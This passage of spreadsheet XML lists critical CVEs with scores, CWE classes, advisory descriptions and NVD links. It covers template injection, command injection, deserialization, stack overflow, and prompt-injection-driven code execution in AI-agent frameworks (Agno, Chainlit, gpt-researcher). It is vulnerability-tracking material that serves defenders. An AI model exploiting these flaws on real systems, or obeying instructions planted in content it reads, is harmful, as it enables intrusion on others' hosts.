          <t>Heap-based</t>
        </is>
      </c>
      <c r="M132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28780</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31020</t>
        </is>
      </c>
      <c r="C133" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D133" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E133" s="5" t="inlineStr"/>
      <c r="F133" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L133" s="5" t="inlineStr">
        <is>
          <t>In DocsGPT 0.15.0 and below, the application provides a custom prompt feature that allows users to define prompt content used during chatbot interactions. This functionality renders user-supplied prompt data using Jinja templates without input sanitization or sandboxing. An unauthenticated attacker can inject malicious template expressions, leading to a server-side template injection (SSTI) vulnerability that can be exploited to achieve full remote code execution (RCE).</t>
        </is>
      </c>
      <c r="M133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31020</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33815</t>
        </is>
      </c>
      <c r="C134" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D134" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E134" s="5" t="inlineStr"/>
      <c r="F134" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr">
        <is>
          <t>jackc:pgx</t>
        </is>
      </c>
      <c r="I134" s="5" t="inlineStr">
        <is>
          <t>2026-04-07</t>
        </is>
      </c>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L134" s="5" t="inlineStr">
        <is>
          <t>Memory-safety vulnerability in github.com/jackc/pgx/v5.</t>
        </is>
      </c>
      <c r="M134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33815</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33816</t>
        </is>
      </c>
      <c r="C135" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D135" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E135" s="5" t="inlineStr"/>
      <c r="F135" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr">
        <is>
          <t>jackc:pgx</t>
        </is>
      </c>
      <c r="I135" s="5" t="inlineStr">
        <is>
          <t>2026-04-07</t>
        </is>
      </c>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L135" s="5" t="inlineStr">
        <is>
          <t>Memory-safety vulnerability in github.com/jackc/pgx/v5.</t>
        </is>
      </c>
      <c r="M135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33816</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35868</t>
        </is>
      </c>
      <c r="C136" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D136" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E136" s="5" t="inlineStr"/>
      <c r="F136" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L136" s="5" t="inlineStr">
        <is>
          <t>A Command Injection vulnerability exists in the bs_SetLimitCli_info function within the libshare.so library of LB-link Router AC2100_AZ3 V1.0.4. This flaw occurs due to insufficient validation and sanitization of user-supplied input before it is passed to a system-level command execution context. An attacker can exploit this vulnerability by injecting specially crafted shell metacharacters or payloads into the vulnerable parameter, resulting in the execution of arbitrary operating system commands.</t>
        </is>
      </c>
      <c r="M136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35868</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35869</t>
        </is>
      </c>
      <c r="C137" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D137" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E137" s="5" t="inlineStr"/>
      <c r="F137" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L137" s="5" t="inlineStr">
        <is>
          <t>A Command Injection vulnerability exists in the bs_SetLimitCli_info function within the libshare.so library of LB-link Router AC450M V4.0.0. This flaw occurs due to insufficient validation and sanitization of user-supplied input before it is passed to a system-level command execution context. An attacker can exploit this vulnerability by injecting specially crafted shell metacharacters or payloads into the vulnerable parameter, resulting in the execution of arbitrary operating system commands.</t>
        </is>
      </c>
      <c r="M137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35869</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-36433</t>
        </is>
      </c>
      <c r="C138" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D138" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E138" s="5" t="inlineStr"/>
      <c r="F138" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L138" s="5" t="inlineStr">
        <is>
          <t>An issue in Actions Semiconductor Co. Ltd Tool- Media Player Utilities v.4.46 allows a physically proximate attacker execute arbitrary code via the Production.dll and RdiskUpgrade.exe components</t>
        </is>
      </c>
      <c r="M138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-36433</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37003</t>
        </is>
      </c>
      <c r="C139" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D139" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E139" s="5" t="inlineStr"/>
      <c r="F139" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G139" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L139" s="5" t="inlineStr">
        <is>
          <t>Agno up to and including 2.5.8 is vulnerable to Remote Code Execution (RCE) via prompt injection. The PythonTools and ShellTools components pass unsanitized, LLM-generated arguments directly to execution sinks including exec(), runpy.run_path(), and subprocess.run(). An unauthenticated attacker can exploit this by embedding malicious instructions in content processed by the agent (such as web pages or documents), allowing for arbitrary code and OS command execution on the host server.</t>
        </is>
      </c>
      <c r="M139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37003</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37006</t>
        </is>
      </c>
      <c r="C140" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D140" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E140" s="5" t="inlineStr"/>
      <c r="F140" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L140" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the WebSocket endpoint of gpt-researcher v0.14.7 and before allows an unauthenticated remote attacker to achieve code execution via malicious Model Context Protocol configurations.</t>
        </is>
      </c>
      <c r="M140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37006</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37236</t>
        </is>
      </c>
      <c r="C141" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D141" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E141" s="5" t="inlineStr"/>
      <c r="F141" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L141" s="5" t="inlineStr">
        <is>
          <t>grpc-gatew</t>
        </is>
      </c>
      <c r="M141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37236</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37751</t>
        </is>
      </c>
      <c r="C142" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D142" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E142" s="5" t="inlineStr"/>
      <c r="F142" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L142" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the killSessionSync function (lib/agent-runtime.ts) of 23blocks-OS ai-maestro v0.24.17 allows attackers to execute arbitrary commands via a crafted input.</t>
        </is>
      </c>
      <c r="M142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37751</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38165</t>
        </is>
      </c>
      <c r="C143" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D143" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E143" s="5" t="inlineStr"/>
      <c r="F143" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L143" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Template Injection (SSTI) vulnerability in the Velocity template engine configuration of xdocreport v0.9.2 to v2.2.0 allows attackers to execute arbitrary code via a crafted expression.</t>
        </is>
      </c>
      <c r="M143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38165</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39254</t>
        </is>
      </c>
      <c r="C144" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D144" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E144" s="5" t="inlineStr"/>
      <c r="F144" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L144" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in SteelSeries GG (macOS) v.107.0.0 allows a remote attacker to execute arbitrary code via the libSSEdevice.dylib, CxAudioHidDevice::DeviceGetDescriptionString components</t>
        </is>
      </c>
      <c r="M144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39254</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39255</t>
        </is>
      </c>
      <c r="C145" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D145" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E145" s="5" t="inlineStr"/>
      <c r="F145" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L145" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in SteelSeries GG (macOS) v.107.0.0 allows a remote attacker to execute arbitrary code via the libSSEdevice.dylib, dup_wcs components</t>
        </is>
      </c>
      <c r="M145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39255</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40860</t>
        </is>
      </c>
      <c r="C146" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D146" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E146" s="5" t="inlineStr"/>
      <c r="F146" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G146" s="5" t="inlineStr">
        <is>
          <t>java, apache</t>
        </is>
      </c>
      <c r="H146" s="5" t="inlineStr">
        <is>
          <t>apache:camel</t>
        </is>
      </c>
      <c r="I146" s="5" t="inlineStr">
        <is>
          <t>2026-04-27</t>
        </is>
      </c>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L146" s="5" t="inlineStr">
        <is>
          <t>JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6.
This issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0.
Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.</t>
        </is>
      </c>
      <c r="M146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40860</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41871</t>
        </is>
      </c>
      <c r="C147" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D147" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E147" s="5" t="inlineStr"/>
      <c r="F147" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G147" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H147" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="I147" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862</t>
        </is>
      </c>
      <c r="L147" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')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147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41871</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42027</t>
        </is>
      </c>
      <c r="C148" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D148" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E148" s="5" t="inlineStr"/>
      <c r="F148" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G148" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H148" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="I148" s="5" t="inlineStr">
        <is>
          <t>2026-05-04</t>
        </is>
      </c>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-502</t>
        </is>
      </c>
      <c r="L148" s="5" t="inlineStr">
        <is>
          <t>Arbitrary Class Instantiation via Model Manifest in Apache OpenNLP ExtensionLoader
Versions Affected: before 1.9.5, before 2.5.9, before 3.0.0-M3
Description: 
The ExtensionLoader.instantiateExtension(Class, String) method loads a class by its fully-qualified name via Class.forName() and invokes its no-arg constructor, with the class name sourced from the manifest.properties entry of a model archive. The existing isAssignableFrom check correctly rejects classes that are not subtypes of the expected extension interface (BaseToolFactory for factory=, ArtifactSerializer for serializer-class-*), but the check runs after Class.forName() has already loaded and initialized the named class. 
Class.forName() with default initialization semantics executes the target class's static initializer before returning, so an attacker who can supply a crafted model archive can cause the static initializer of any class on the classpath to run during model loading, regardless of whether that class passes the subsequent type check. 
Exploitation requires a class with attacker-useful side effects in its static initializer (for example, JNDI lookup, outbound network I/O, or filesystem access) to be present on the classpath, so this is not a drop-in remote code execution; however, the attack surface grows as third-party model distribution becomes more common (community model repositories, Hugging Face-style sharing), where users routinely load model files from origins they do not control. A secondary, narrower vector affects deployments that ship legitimate BaseToolFactory or ArtifactSerializer subclasses with side-effecting no-arg constructors: a malicious manifest can name such a class and force its constructor to run during model load.
Mitigation: 
  *  2.x users should upgrade to 2.5.9. 
  *  3.x users should upgrade to 3.0.0-M3. 
Note: The fix introduces a package-prefix allowlist that is consulted before Class.forName() is invoked, so the static initializer of a disallowed class is never executed. Classes under the opennlp. prefix remain permitted by default. Deployments that load models referencing factories or serializers outside opennlp.* must opt those packages in, either programmatically via ExtensionLoader.registerAllowedPackage(String) before the first model load, or by setting the OPENNLP_EXT_ALLOWED_PACKAGES system property to a comma-separated list of allowed package prefixes. 
Users who cannot upgrade immediately should ensure that all model files are sourced from trusted origins and should audit their classpath for classes with side-effecting static initializers or constructors, particularly any that perform JNDI lookups, network requests, or filesystem operations during class initialization.</t>
        </is>
      </c>
      <c r="M148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42027</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42581</t>
        </is>
      </c>
      <c r="C149" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D149" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E149" s="5" t="inlineStr"/>
      <c r="F149" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I149" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L149" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.</t>
        </is>
      </c>
      <c r="M149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42581</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45018</t>
        </is>
      </c>
      <c r="C150" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D150" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E150" s="5" t="inlineStr"/>
      <c r="F150" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G150" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L150" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For stdio transport, the endpoint accepts a user-controlled fullCommand string. The validate_mcp_command() function in backend/chainlit/mcp.py checks only the executable name against config.features.mcp.stdio.allowed_executables and passes unchecked arguments to StdioServerParameters in backend/chainlit/server.py. Because npx supports the -c argument, an attacker can execute arbitrary shell commands with the privileges of the Chainlit process. If allowed_executables is unset, its None default is treated as allowing every executable. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="M150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45018</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45117</t>
        </is>
      </c>
      <c r="C151" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D151" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E151" s="5" t="inlineStr"/>
      <c r="F151" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L151" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. From 1.8.13 until 1.8.40, the installer module does not properly escape user-supplied database configuration values written to the configuration file, resulting in PHP code injection and remote code execution when the installer is available. install/index.php processes the values with addcslashes(), but the $characters argument added in MyBB 1.8.13 does not include the backslash character, allowing crafted input to escape the generated PHP string. The uniquely identifying implementation details include introduced in MyBB 1.8.13. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45117</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45538</t>
        </is>
      </c>
      <c r="C152" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D152" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E152" s="5" t="inlineStr"/>
      <c r="F152" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L152" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. In versions 4.0.0 and prior, processing a SIP message with a header name longer than 255 bytes causes a stack buffer overflow when sip_to_json() is called in the routing script. Function sip_to_json() (modules/sipmsgops/sipmsgops.c) copies SIP header names into a fixed 255-byte stack buffer without bounds checking, performing a memcpy of the full header-name length even though the SIP parser imposes no such limit (a header name can be roughly 65000 bytes). As a result, when a routing script calls sip_to_json(), a SIP message with a header name longer than 255 bytes triggers a stack buffer overflow in which both the length and content of the overwrite are attacker-controlled, corrupting the saved frame pointer and return address. A single unauthenticated UDP packet to the SIP port (5060) can crash the process or, on builds without stack protections, hijack the return address to achieve remote code execution. This affects deployments whose routing script invokes sip_to_json(). This issue was not fixed at the time of publication.</t>
        </is>
      </c>
      <c r="M152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45538</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
